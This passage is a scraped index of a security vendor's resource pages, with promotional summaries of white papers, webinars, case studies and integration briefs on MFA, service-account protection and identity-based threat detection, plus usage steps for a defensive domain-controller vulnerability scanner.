https://www.silverfort.com/resources/zol-and-silverfort-a-case-study/ When ZOL hospital in Belgium needed to protect its service accounts from attack with minimal disruption, they turned to Silverfort. https://vimeo. com/741624853 --- - Published: 2022-07-31 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/rwc-and-silverfort-a-case-study/ Reliance Worldwide Corporation is a publicly-traded leading manufacturer. Like many companies of its size, RWC cannot afford delays in production from a ransomware attack. That’s why they have implemented Silverfort’s solution to extend MFA to Entra ID (formerly Azure AD) and command line interfaces. By doing so they have gained the ability to prevent the types of damage a ransomware attack coupled with lateral movement might cause. https://www. youtube. com/watch? v=mC7Mm4-Z8OY --- - Published: 2022-07-24 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-app-for-splunk/ The Silverfort App for Splunk brings advanced identity threat intelligence directly into your SOC’s existing workflows. This PDF breaks down how Silverfort enhances Splunk with deep visibility into authentication activity, denied MFA events, and identity-based attacks like Pass the Hash, Kerberoasting, brute force attempts, and lateral movement. Instead of combing through logs from multiple IdPs and tools, your team gets a unified view of identity threats—complete with rich visualizations, attack context, and prioritized risk scores. The result? Faster investigations, clearer insights, and more decisive responses. If your team uses Splunk and you're serious about stopping identity-based attacks, this integration is a must. In this PDF, you’ll learn how to: Gain real-time alerts on concrete identity threats across cloud and on-prem environments. Accelerate investigations with detailed dashboards and forensic data on users, systems, and attack types. Deliver a consistent SOC experience by integrating identity threat intelligence into your native Splunk environment. Download the PDF now to see how Silverfort and Splunk deliver identity threat detection that’s smart, fast, and fully operational. --- - Published: 2022-07-24 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/whitepaper-service-accounts-best-practices/ Your service accounts are a security blind spot. Here’s how to fix that. Service accounts are critical. They’re also one of the least protected parts of your identity infrastructure. This white paper explains why these non-human identities—used by systems and applications to communicate—are high-value targets for attackers, and how most organizations unknowingly leave them wide open to compromise. We lay out a practical, step-by-step guide for securing service accounts across hybrid environments, so you can learn how to automatically discover every account, understand how they’re being used, assess risk, and enforce least-privilege access—without disrupting your operations. Whether you're starting from scratch or optimizing an existing strategy, this guide will help you reduce risk, prevent lateral movement, and shrink your attack surface. In this white paper, you’ll learn how to: Discover and inventory all service accounts, including machine-to-machine, hybrid, scanner, and dormant accounts. Prioritize protection based on risk, privilege, and usage patterns using built-in Silverfort insights. Automate policy enforcement with smart rules and integrations (like ServiceNow and REST APIs). Download the white paper and start taking control of your most overlooked security gap—before attackers do. --- - Published: 2022-07-24 - Modified: 2025-02-27 - URL: https://www.silverfort.com/resources/the-essential-eight-maturity-model/ This whitepaper specifies how organisations can use the Silverfort Unified Identity Protection platform to implement the identity protection aspect of the Essential Eight Maturity Model framework per its recent update in October 2021. Download this whitepaper to learn: What is the Essential Eight Maturity Model? What parts of the Essential Eight does Silverfort address? What protection do mitigations provide? --- - Published: 2022-07-24 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-sentinelone-identity-threat-protection/ What if your XDR platform could detect identity-based threats—and your identity tools could respond to endpoint attacks? With Silverfort and SentinelOne, that’s no longer a “what if. ” This PDF breaks down how the two platforms integrate to deliver unified protection across both the endpoint and identity attack surfaces. Whether it’s fileless malware or lateral movement using compromised credentials, Silverfort and SentinelOne detect and shut it down in real time—before damage is done. Silverfort alerts SentinelOne to identity-based anomalies (like brute force or denied authentications), triggering autonomous response at the endpoint. Likewise, SentinelOne flags suspicious endpoint behavior, prompting Silverfort to enforce risk-based access policies. It’s proactive, bi-directional protection that strengthens your Zero Trust posture without slowing operations. In this PDF, you’ll learn how to: Stop lateral movement by correlating identity threats and endpoint behavior in real time. Accelerate investigations with full visibility into process execution and authentication trails. Enforce adaptive MFA and block access to high-risk resources based on live threat context. Download the PDF now to see how Silverfort and SentinelOne deliver powerful identity + endpoint protection that’s smarter, faster, and built for today’s threats. --- - Published: 2022-07-24 - Modified: 2025-07-28 - URL: https://www.silverfort.com/resources/silverfort-for-windows-login/ Protect every Windows login with adaptive MFA from Silverfort If attackers can log in, they can break in. So why not strengthen your defenses at the very first step—Windows logon? This solution brief reveals how Silverfort adds a powerful layer of protection to every Windows authentication across your organization without requiring extra infrastructure. By operating at the authentication protocol level, Silverfort enables real-time MFA enforcement for both domain-based and local logins, whether on a physical machine, virtual environment, or even offline system. With risk-based policies, geo-fencing, and offline OTP or FIDO2 token support, Silverfort gives organizations precise control over who can log in, from where, and under what conditions. From RDP to UAC prompts, Silverfort secures every access point, stopping compromised credentials, brute force attempts, and malicious lateral movement in its tracks. In this PDF, you’ll learn how to: Apply MFA to any Windows login, including Remote Desktop and offline machines, with policy-based control. Deploy adaptive security policies like geo-restrictions, risk-based triggers, and access blocks at the device layer. Gain deep visibility with audit-ready authentication logs and detailed tracking of user activity. Download the PDF to learn how Silverfort transforms Windows logon into a proactive line of identity defense built for today’s hybrid workforce. --- - Published: 2022-07-24 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/help-your-clients-qualify-for-cyber-insurance-coverage-with-silverfort/ Silverfort enables clients to easily meet the new cyber insurance requirements for MFA protection across all sensitive systems, both on-prem and in the cloud, including legacy systems and admin interfaces that couldn’t be protected before. Download this solution brief to learn how Silverfort: Empowers brokers to help clients comply with specific MFA requirements Offers a dedicated program to incentivize insurance brokers to grow their business. Extends MFA to any resource and access interface across the on-prem and multi-cloud enterprise environment. --- - Published: 2022-07-24 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/implementing-mfa-for-cyber-insurance-made-easy-with-silverfort/ The new requirement for MFA protection introduces a severe challenge to organizations of all sizes since standard MFA solutions cannot deliver the required coverage. Silverfort is the only solution that can consolidate compliance with the full cyber insurance MFA checklist, without requiring agents or proxies, making it an ideal choice for any organization that seeks to purchase or renew its cyber insurance policy. Download this solution brief to learn how Silverfort: Empowers organizations to implement cyber liability policies by checking off all the MFA requirements. Offers MFA access control on all on-prem and cloud resources in production environments to proactively prevent ransomware attacks. Helps apply MFA protection capabilities that natively integrate with all your identity providers, rather than applying agents or proxies. --- - Published: 2022-07-20 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-hypr-extending-passwordless-mfa-to-all-resources-within-your-environments/ What if you could apply HYPR’s passwordless MFA to every app, server, and command-line tool—without touching a single one? The Silverfort + HYPR integration brings modern, phishing-resistant authentication to the legacy and hybrid systems that previously couldn’t be protected. Think PowerShell, PsExec, on-prem servers, file shares, RDP sessions—you name it. Silverfort’s platform evaluates every access request in real time. When risk is detected, it prompts HYPR to issue a passwordless MFA challenge through its mobile app. The result? Seamless security across your entire environment, without disrupting users or rewriting apps. This solution brief walks you through how it works, why it matters, and how to make passwordless identity protection truly universal. In this PDF, you’ll learn how to: Extend HYPR passwordless MFA to all resources—on-prem, cloud, and everything in between. Leverage context-aware access policies that trigger MFA only when risk is detected. Unify identity security across your organization with real-time enforcement and zero disruption. Download the PDF now and discover how Silverfort and HYPR are redefining what’s possible with passwordless security. --- - Published: 2022-07-06 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/indosat-and-silverfort-a-case-study/ IndoSat explains how Silverfort addresses their concerns about identity-based attacks by providing continuous visibility and real-time risk analysis across all their network resources, includes those previously thought unprotectable. https://www. youtube. com/watch? v=lS7OptU4-88 --- - Published: 2022-07-06 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/privileged-accounts-protection-reborn-with-silverfort/ Creating easily implemented MFA policies for all your privileged accounts is the only way to ensure they are not compromised. With no need for customizations or network segmentation dependencies, you can be up and running within minutes. Download this brief to learn: Why a PAM vault is no longer sufficient for privileged account protection How to easily apply MFA to privileged accounts How Silverfort complements your existing PAM solution --- - Published: 2022-03-09 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/egan-and-silverfort-a-case-study/ In this testimonial from Egan, they discuss how Silverfort enabled them to extend their coverage to assets that could not be protected until today, such as homegrown/legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. Silverfort continuously monitors all access of users and service accounts across both cloud and on-premise environments, analyzes risk in real time using an AI-based engine, and enforces adaptive authentication and access policies. Silverfort allows organizations to prevent data breaches, achieve compliance, reduce costs and simplify cloud migration. End to End MFA and Service Account Protection https://youtu. be/L_PkXAd7UFo --- - Published: 2022-02-20 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/webinar-the-journey-to-identity-centric-zero-trust-architecture/ More and more organizations acknowledge the implementation of Zero Trust in the identity control plane as the best protection against compromised credentials attacks on on-prem and cloud resources. However, the way to achieve true identity-based Zero Trust is not always clear. Join Abbas Kudrati, APAC Chief Cybersecurity Advisor of Microsoft, and Hed Kovetz, Co-Founder and CEO of Silverfort, as they discuss: How Identity-Centric Zero Trust transforms and elevates organizations’ security posture The difference between Identity vs Network-centric Zero Trust models The typical challenges organizations face in their Zero Trust journey How to resolve legacy authentication protocol and legacy application authentication challenges in your Zero Trust journey Real-life examples of attacks prevented by having Identity-Centric Zero Trust in place --- - Published: 2022-02-09 - Modified: 2024-11-05 - URL: https://www.silverfort.com/resources/cyber-insurance-ebook/ Everyone knows the value of cyber insurance but keeping up with cyber insurance requirements can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. We’re here to help you make sense of what you’ll need. This eBook explains: What types of MFA are required for cyber liability insurance How to evaluate cyber insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network --- - Published: 2022-01-24 - Modified: 2024-09-26 - URL: https://www.silverfort.com/resources/silverfort-mfa-protect-the-unprotectable-white-paper/ The Silverfort MFA solution represents a fundamentally different approach to identity protection, providing MFA coverage to all enterprise resources – including those previously considered unprotectable – without agents or proxies. This white paper will demonstrate how you can: Extend MFA protection to ALL enterprise resources – without blind spots! Address a wide array of MFA use cases Integrate with all on-prem and cloud directories by means of a single solution --- - Published: 2021-12-08 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/mas-risk-management-guidelines-silverfort-white-paper/ The Monetary Authority of Singapore has revised its risk management guidelines to reduce the risk of identity-based attacks. Financial institutions will need to comply, and compliance is not a trivial matter. Silverfort is uniquely positioned to help institutions comply with the Identity Protection aspects of the new MAS guidelines. This white paper explains how you can: Extend MFA to resources that could never before have been protected – without agents or proxies Provide real-time risk scoring for all authentications and access attempts Enforce both rule-based and adaptive risk-based access policies to ensure that accounts aren’t compromised --- - Published: 2021-10-24 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/re-evaluate-your-mfa-protection-ebook/ MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk. MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk. Download this eBook to learn: What are the security gaps in traditional MFA solutions? How can you assess your existing MFA protection to better understand your risk exposure? How can you gain end-to-end MFA coverage for all your cloud and on-prem resources? --- - Published: 2021-08-10 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/rethinking-ransomware-protection/ Learn why ransomware propagation is often a blind spot for today’s security products, and how emerging Unified Identity Protection technology can proactively prevent such propagation.  This eBook will explain: Why propagation is the most critical stage in a ransomware attack What makes this propagation a blind spot for today’s security products How Silverfort’s Unified Identity Protection platform proactively prevents ransomware propagation --- - Published: 2021-07-27 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/unified-risk-analysis-ping-id/ Silverfort’s Unified Risk Analysis across cloud and hybrid environments detects and prevents identity-based attacks with comprehensive risk analysis and adaptive policies. Silverfort’s Unified Risk Analysis across cloud and hybrid environments detects and prevents identity-based attacks with comprehensive risk analysis and adaptive policies. Download this brief to understand how Silverfort can help with: End-to-end identity protection with Ping Identity Risk analysis based on the full context of user activity Risk-based authentication and zero trust policies --- - Published: 2021-07-05 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/mfa-not-just-for-admins/ Many believe that MFA is needed only for privileged accounts. This misconception can have far-reaching consequences, as recent events have demonstrated that only a full MFA deployment across all organizational assets can block potential attackers. Many believe that MFA is needed only for privileged accounts. This misconception can have far-reaching consequences, as recent events have demonstrated that only a full MFA deployment across all organizational assets can block potential attackers. Download this brief to learn from recent real-life attacks how to: Recognize attacks from those logging in with legitimate yet compromised credentials Discover and monitor anomalous behavior from service accounts Detect lateral movement within a hybrid network --- - Published: 2021-07-05 - Modified: 2024-09-26 - URL: https://www.silverfort.com/resources/discover-critical-identity-vulnerabilities/ Domain Controllers are the nerve system of your enterprise. Silverfort's vulnerability assessment tool enables you to discover all DCs in your domain and tell whether they have vulnerabilities that expose them to identity-based attacks. Domain Controllers are a core part of your enterprise infrastructure and are thus a target of choice for threat actors. Ensuring that your DCs do not contain vulnerabilities that expose them to compromise is a key part of your resilience to cyberattacks. Silverfort’s Vulnerability Assessment Tool scans your domain, detects all domain controllers and assesses whether your domain is exposed to critical identity-based vulnerabilities: Zerologon (CVE-2020-1472) Bronze Bit (CVE-2020-17049) Printer Spooler Vulnerabilities (CVE-2021-1675 and CVE-2021-34527 aka PrintNightmare and CVE-2021-34481) LDAP Relay PetitPotam (PSPKI Audit) KDC Spoofing Disclaimers and Tool Security Silverfort’s Vulnerability Assessment Tool uses public methods to scan and identify vulnerabilities remotely. It uses LDAP protocol to detect all domain controllers. Due to its sensitivity, we require the use of LDAPS (Secured) by default. The tool requires Domain Admin privileges to access the domain controllers using WMI to collect information needed to estimate the exposure status. The information collected by the tool is stored locally and is not sent out. BY DOWNLOADING OR ACCESSING THE VULNERABILITY ASSESSMENT TOOL SOFTWARE (“SOFTWARE”), YOU ACCEPT THE TERMS OF SERVICE IN THIS LINK AND AGREE TO BE BOUND BY THEM. IF YOU DO NOT ACCEPT OR AGREE WITH THESE TERMS OF SERVICE, PLEASE DO NOT DOWNLOAD OR ACCESS THE SOFTWARE. How to use the tool Download the Silverfort Vulnerability Assessment Tool. Run SFDetector. exe from any Windows computer with network access to domain controllers. If you are not yet logged in as Domain Admin, select “Run as different user” and enter your Domain Admin credentials and Domain Fully Qualified Domain Name (FQDN). Choose desired vulnerability (all checked by default). Press Run and wait for the assessment to finish; a CSV output file will be created in the folder you ran the script from with results of the assessment. If you would like to see this tool assess additional vulnerabilities or provide feedback, please reach out to info@silverfort. com --- - Published: 2021-06-20 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/introducing-unified-identity-protection-german/ Watch this short video about Unified Identity Protection, the first security solution that is purpose-built to secure modern enterprises against identity-based attacks. Watch this short video (with German subtitles) about Unified Identity Protection, the first security solution that is purpose-built to secure modern enterprises against identity-based attacks. This includes unauthorized access to sensitive resources, the spread of malware via lateral movement, and more. By Hed Kovetz, CEO and Co-Founder at Silverfort. --- - Published: 2021-05-25 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/improving-cybersecurity-with-unified-identity-protection/ Following recent cybersecurity incidents such as SolarWinds, Microsoft Exchange, and the Colonial Pipeline incident, President Biden signed on May 21st, 2021 an Executive Order (EO) to improve the nation’s cybersecurity and protect federal government networks. Silverfort’s Unified Identity Protection platform is uniquely positioned to help agencies and enterprises address three main requirements laid out in the recent US Executive Order on cybersecurity. Download this brief to understand how Silverfort can help with: Establishing multi-factor, risk-based authentication, and conditional access across theenterprise Prioritizing resources for the adoption and use of cloud technology Developing a plan to implement Zero Trust Architecture --- - Published: 2021-05-05 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/can-you-block-lateral-movement-in-real-time-3/ Watch the On Demand webinar to learn the difference between standard and advanced attacks, and why security solutions often fail to detect and prevent these attacks. Did you know that lateral movement attacks leverage compromised credentials to propagate through the network and gain access to target resources? In this recorded webinar, we explain these attacks, and the use of compromised credentials in various steps the difference between standard and advanced attacks, and why security solutions often fail to detect and prevent these attacks. Finally, we will explain how Silverfort’s cutting edge identity platform can detect and block these attacks. Topics covered: What are the most common lateral movement attacks The identity and security aspects of lateral movement Why security products often fail to prevent lateral movement How Silverfort’s Unified Identity Protection platform eliminates different types of lateral movement attacks in real time Speakers Yiftach Keshet, Director Of Product Marketing at Silverfort Yiftach Keshet leads the Product Marketing at Silverfort. Prior to joining Silverfort he served in various Product Management and Product Marketing roles with cybersecurity market leaders such as Microsoft, Palo Alto Networks and Team8. Gal Sadeh, Chief Data Scientist at Silverfort Gal is Chief Data Scientist in Silverfort’s research team. He is responsible for big data analytics and developing AI engines. He joined Silverfort after many years of research and leadership roles at the 8200 elite cyber unit of the Israel Defense Forces. Gal holds a Masters in Mathematics and Computer Science from Tel Aviv University. --- - Published: 2021-02-28 - Modified: 2025-05-27 - URL: https://www.silverfort.com/resources/silverfort-unified-identity-protection-overview/ The Silverfort Identity Security Platform closes critical identity security gaps that traditional solutions cannot address. By leveraging our patented Runtime Access Protection™ (RAP) technology, Silverfort natively integrates with your entire Identity and Access Management (IAM) stack—including Active Directory, cloud IdPs, SaaS, and IaaS—without requiring any changes to infrastructure. The platform offers comprehensive visibility and control over all human and non-human identities (NHIs). It enables organizations to detect, analyze, and mitigate identity risks in real time, proactively stopping lateral movement, privilege escalation, and ransomware attacks before they happen. Key capabilities include: Universal MFA enforcement, extending protection to legacy systems and interfaces where MFA was previously impossible. Real-time threat detection and policy-based blocking of malicious access without disrupting business operations. Just-in-Time access policies for privileged users to minimize excessive access and prevent misuse. Silverfort’s unique architecture allows security teams to automatically discover and classify all identities, monitor access behaviors across environments, and enforce security controls seamlessly. Trusted by 1,000+ organizations globally, it delivers maximum security with minimal friction, reducing attack surfaces and simplifying identity security at scale. Get the Silverfort Identity Security Platform overview to: Discover how Silverfort’s patented RAP technology enables true end-to-end identity security without changes to infrastructure. Learn how we discover and secure all identities—human and non-human, on-prem and in the cloud—with full observability and control. Explore how organizations like Kayak, Singtel, and RWC are using Silverfort to protect their businesses. --- - Published: 2021-02-22 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/thank-you-page-why-service-accounts-and-machine-to-machine-access-should-be-part-of-any-zero-trust-initiative/ With hundreds or even thousands of unsupervised, highly-privileged service accounts running in any modern organization, and given the difficulties of securing them, they often become a prime target for attackers. With hundreds or even thousands of unsupervised, highly-privileged service accounts running in any modern organization, and given the difficulties of securing them, they often become a prime target for attackers. In the third part of this series, our guest speaker Dr. Chase Cunningham, former Forrester VP and Principal Analyst will explain why service accounts, used for machine-to-machine access, must be included in any Zero Trust initiative. Hed Kovetz will explain how Silverfort is automatically discovering, monitoring and securing these sensitive non-human accounts with self-learning Zero Trust policies, without requiring password changes. Other topics covered in this series: • Why Unified IAM Visibility and Control is Key for Zero Trust Security• The Importance of Risk Analysis and Adaptive Policies in Zero Trust Security• Enabling Cloud Migration with Identity-Based Zero Trust --- - Published: 2021-02-22 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/thank-you-page-enabling-cloud-migration-with-identity-based-zero-trust/ Zero Trust security goes beyond the traditional perimeter-based security model, and enables companies to migrate assets outside of their on-premise environment without compromising on security. Zero Trust security goes beyond the traditional perimeter-based security model, and enables companies to migrate assets outside of their on-premise environment without compromising on security. In the final part of this four-part series, our guest speaker Dr. Chase Cunningham, former Forrester VP and Principal Analyst will explain the challenges and the importance of Zero Trust security in the cloud and in hybrid environments. Hed Kovetz will explain how to leverage an identity-based Zero Trust approach to protect cloud and hybrid environments holistically, covering both cloud-native assets and migrated apps, enabling secure ‘Lift and Shift’ cloud migration – no code changes required. Other topics covered in this series: • Why Unified IAM Visibility and Control is Key for Zero Trust Security• The Importance of Risk Analysis and Adaptive Policies in Zero Trust Security• Why Service Accounts and Machine-to-Machine Access Should be Part of Any Zero Trust Initiative --- - Published: 2021-02-11 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/risk-analysis-and-adaptive-policies-in-zero-trust-security/ In order to achieve effective Zero Trust security, you have to continuously analyze risk across all users, devices, systems and environments. A zero trust policy engine is essential to securing the fundamental flow of people accessing resources with devices through a network. In the second part of this series, Dr. Chase Cunningham will explain why controlling the flow of data if identity-based MFA with zero trust policies must be included in any Zero Trust initiative. Hed Kovetz will explain how Silverfort is automatically discovering, monitoring and securing these sensitive non-human accounts with self-learning Zero Trust policies, without requiring password changes. Other topics covered in this series: • Why Unified IAM Visibility and Control is Key for Zero Trust Security• Why Service Accounts and Machine-to-Machine Access Should be Part of Any Zero Trust Initiative• Enabling Cloud Migration with Identity-Based Zero Trust --- - Published: 2021-02-09 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/thank-you-page-why-unified-iam-visibility-control-is-key-for-zero-trust/ Successful Zero Trust implementations focus heavily on telemetry and metrics derived from identities. Successful Zero Trust implementations focus heavily on telemetry and metrics derived from identities. Anything that has an identity must be considered and verified in order to achieve true Zero Trust security — users, services, devices and cloud assets. Monitoring these identities and their behavior enables deeper understanding of what an entity is doing to better identify and prevent malicious or unauthorized access. Join Silverfort’s CEO and Co-Founder Hed Kovetz, and guest speaker Dr. Chase Cunningham, former Forrester VP and Principal Analyst for a discussion on the different aspects and the growing importance of identity in Zero Trust implementations. Other topics covered in this series: • The Importance of Risk Analysis and Adaptive Policies in Zero Trust Security• Why Service Accounts and Machine-to-Machine Access Should be Part of Any Zero Trust Initiative• Enabling Cloud Migration with Identity-Based Zero Trust --- - Published: 2020-11-19 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/silverfort-adaptive-authentication-white-paper/ This white paper reviews the benefits and challenges of adaptive authentication, read more... Download Silverfort adaptive authentication white paper: Silverfort delivers adaptive authentication across all corporate networks and cloud environments from a unified platform, without requiring any software agents or inline proxies. By analyzing authentication activity across all users, devices, systems and environments, and leveraging Silverfort’s AI-based Risk Engine, it enables holistic risk-based adaptive authentication with unparalleled accuracy. Download this pdf to: Learn what are the benefits and challenges of adaptive authentication Get a technical overview of Silverfort’s holistic risk engine Understand what are the unique advantages of Silverfort’s agentless next-generation authentication platform --- - Published: 2020-10-28 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/thank-you-page-four-simple-steps-to-secure-your-service-accounts-30-minutes-on-demand/ With hundreds or even thousands of unsupervised, highly-privileged service accounts running in modern organizations, they can become high-risk assets. With hundreds or even thousands of unsupervised, highly-privileged service accounts running in modern organizations, they can become high-risk assets. Join us for a discussion about four simple steps you can take to secure these accounts and reduce the risk of a cyber attack. Speakers Hed Kovetz, Silverfort Co-Founder and CEO Hed brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL. B. from Tel Aviv University. Revital Aronis, Sr. Product Manager, Silverfort Revital is a Senior Product Manager in Silverfort’s PM department. Prior to joining Silverfort, Revital was a product manager at illusive networks, and held different R&D positions at Contextream and HPE. Before that Revital served as a team leader at the 8200 elite cyber unit of the Israel Defense Forces. Revital holds a B. A in Computer Science and Psychology from Tel Aviv University --- - Published: 2020-09-22 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/thank-you-page-form-extending-yubikey-fido2-hardware-tokens-to-any-system-and-interface-with-silverfort-2/ Now more than ever, organizations need a holistic authentication solution to maximize security without disrupting productivity. Now more than ever, organizations need a holistic authentication solution to maximize security without disrupting productivity. An efficient way to do so is to strengthen weak static username/password credentials with strong FIDO2 hardware-backed public/private-key credentials. In this session with Silverfort and Yubico experts, we’ll review the integrated solutions, discuss key customer use cases and explain how you can now: Extend FIDO2 hardware-backed Multi-Factor Authentication to any system or interface Enforce strong authentication without implementing software agents, changing application code, or using proxies Take advantage of the integrated solutions to address various use cases Speakers Jonathan Nativ, Sales Director, APAC at Silverfort Jonathan Nativ is the Sales Director for APAC at Silverfort, the provider of agentless authentication solutions. Before moving into Sales, Jonathan managed all the Pre-Sales Activates at Silverfort for EMEA and APAC. Prior to that, Jonathan worked for 6 years at CyberArk software where he managed all Training Activates in EMEA and APAC as well as managing channel pre-sales activities in EMEA. Jonathan holds a BA in IT Management from the Ben Gurion University as well as an MBA from Tel Aviv University. --- - Published: 2020-07-29 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/partner-spotlight-series-silverfort-talks-about-meeting-customer-demands-with-the-yubikey/ Silverfort enables customers to seamlessly extend hardware-backed multi-factor authentication (MFA) with YubiKey across all systems ... Silverfort enables customers to seamlessly extend hardware-backed multi-factor authentication (MFA) with YubiKey across all systems and environments without requiring additional agents, proxies or software changes. Silverfort enables customers to leverage the combined security of FIDO2/WebAuthn and YubiKey hardware to extend adaptive authentication and zero-trust policies to effectively prevent unauthorized access to sensitive assets. https://www. youtube. com/watch? v=1UT3-z-wNXc --- - Published: 2020-07-23 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/thank-you-page-form-blocking-identity-based-threats-with-silverfort-palo-alto-networks-cortex-xsoar-2/ Automate your security operations and response to identity-based threats and behavior anomalies with Silverfort playbooks. Automate your security operations and response to identity-based threats and behavior anomalies with Silverfort playbooks. Learn how to:• Automate threat enrichment with Silverfort’s continuous AI-driven risk data• Automate step-up authentication with agentless multi-factor authentication• Automate response to malicious user activities• Automate service account security• Automate the enforcement of dynamic zero-trust policies Speakers Hed Kovetz, Silverfort Co-Founder and CEO Hed brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL. B. from Tel Aviv University. Ron Rasin, VP Product Management Ron leads Silverfort’s product management and roadmap. He brings over a decade of hands-on product management experience and cyber security expertise. Prior to joining Silverfort, Ron was the Director of Product Management at Claroty, and held product management roles at Wix and NCR. Before that Ron served as a Team Leader at the 8200 elite cyber unit of the Israel Defense Forces. Ron holds a B. A in Economics from Tel Aviv University --- - Published: 2020-07-20 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/securing-service-accounts-without-changing-passwords/ Service accounts are a prime target for hackers. However, securing the use of service accounts is a major challenge for enterprises... Service accounts are a prime target for hackers. However, securing the use of service accounts is a major challenge for enterprises. Silverfort’s Agentless Authentication platform is uniquely positioned to protect Active Directory domain service accounts without the intrusive need for frequent password changes, or even being aware of their existence. Silverfort’s CTO and Co – Founder Yaron Kassner discusses this with SecurityGuyTV. com during Coronacon 2020 virtual conference: https://vimeo. com/439936324 --- - Published: 2020-06-23 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/okta-silverfort-multi-factor-authentication-for-desktops-and-systems-across-the-enterprise/ Silverfort’s integration with Okta extends your MFA coverage to the places it’s traditionally never reached—like legacy applications, command-line tools, file shares, and on-prem servers. This solution brief walks you through how the Silverfort + Okta partnership brings adaptive, risk-based MFA to your entire environment—on-prem and in the cloud—without creating user friction. By combining Silverfort’s real-time risk analysis with Okta’s proven MFA, organizations can detect identity threats faster, respond smarter, and protect every access point—including ones Okta couldn’t reach before. And the best part? Users only get MFA prompts when something’s suspicious, reducing fatigue while increasing security. Whether you’re looking to bolster your zero trust strategy or eliminate MFA blind spots, this guide is your starting point. In this PDF, you’ll learn how to: Extend Okta MFA to all resources, even legacy and on-prem systems that previously couldn’t be protected. Leverage adaptive risk analysis to enforce MFA only when needed, minimizing disruption and fatigue. Deliver a consistent user experience with one unified MFA flow across cloud and on-prem access. Get the solution brief now to discover how you can turn Okta into an end-to-end MFA powerhouse with Silverfort. --- - Published: 2020-05-31 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/can-you-detect-and-block-the-evasive-threat-of-lateral-movement/ After penetrating the network, hackers use various lateral movement techniques to gain access to their target systems and data. In order to prevent compromise... After penetrating the network, hackers use various lateral movement techniques to gain access to their target systems and data. In order to prevent compromise, you need to detect and block lateral movement attempts early on. However, that’s not a simple task. Watch this recorded webinar to learn: What lateral movement means How lateral movement techniques are used in a range of attacks Ways to detect and block various attacks at an early stage Speakers Mike Carroll, CISSP, Sr. Sales Engineer at Silverfort Mike Carroll is a senior engineer with 20 years’ experience in IT Security, from desktop technician to Unix systems administrator to IT Director and into independent consulting delivering world class solutions to world class companies spanning every major industry. Mike has broad experience with enterprise class Unix/Linux and Microsoft based security and management technologies. A comprehensive understanding of the modern Privileged Account Management including hands on experience with solutions from Quest, BeyondTrust and CyberArk as well as Multifactor Authentication. Rich Peckham, Solution Architect at Silverfort Rich is a Solution Architect at Silverfort. He has more than 20 years of experience with Active Directory and Cybersecurity. Prior to joining Silverfort, Rich was a Senior Infrastructure Systems Engineer with Facebook for 2 years. Prior to Facebook, Rich was with Microsoft for over 10 years as a Senior Premier Field Engineer for Active Directory and then as a Senior Service Engineer specializing in Active Directory Cybersecurity. Rich is also a Microsoft Certified Master in Active Directory on Windows Server 2008 and Windows Server 2008 R2 and a Microsoft Certified Solutions Master in Windows Server 2012. Gal Sadeh, Sr. Data Scientist at Silverfort Gal is a Senior Data Scientist in Silverfort’s research team. He is responsible for big data analytics and developing AI engines. He joined Silverfort after many years of research and leadership roles at the 8200 elite cyber unit of the Israel Defense Forces. Gal holds a B. Sc. in Mathematics and Computer Science from Tel Aviv University. --- - Published: 2020-05-19 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/thank-you-page-form-is-remote-access-putting-your-organization-at-risk/ Recent events forced us to change the way we work and today most employees are working remotely. While enabling remote access is critical these days, it’s also exposing us to more risk... Recent events forced us to change the way we work and today most employees are working remotely. While enabling remote access is critical these days, it’s also exposing us to more risk: when hundreds of users are inside the network – who is monitoring and validating that access to our most sensitive assets is legitimate and secure? In this webinar, we’re discussing why remote access is putting organizations at risk. We will review examples of relevant attacks that target our most critical assets, like Active Directory. Finally, we’ll discuss what should be done to mitigate the threat and protect sensitive assets from breach and compromise. Watch this recorded webinar to learn: Why remote access is putting organizations at risk Examples of relevant attacks that target most critical assets, like Active Directory What should be done to mitigate threats and 